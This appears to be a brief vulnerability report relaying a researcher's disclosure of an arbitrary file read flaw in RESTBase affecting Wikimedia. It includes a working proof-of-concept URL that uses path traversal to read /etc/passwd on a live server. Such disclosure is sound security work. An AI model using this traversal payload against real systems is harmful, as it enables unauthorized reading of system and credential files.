As reported by Neal Poole to our security alias:
I recently received a report about an arbitrary file read vulnerability in RESTBase which appears to affect Wikimedia systems. It allows for arbitrary file read as the user the server is running as: PoC: https://en.wikipedia.org/api/rest_v1/?path=....//....//....//....//....//....//....//....//etc/passwd&doc=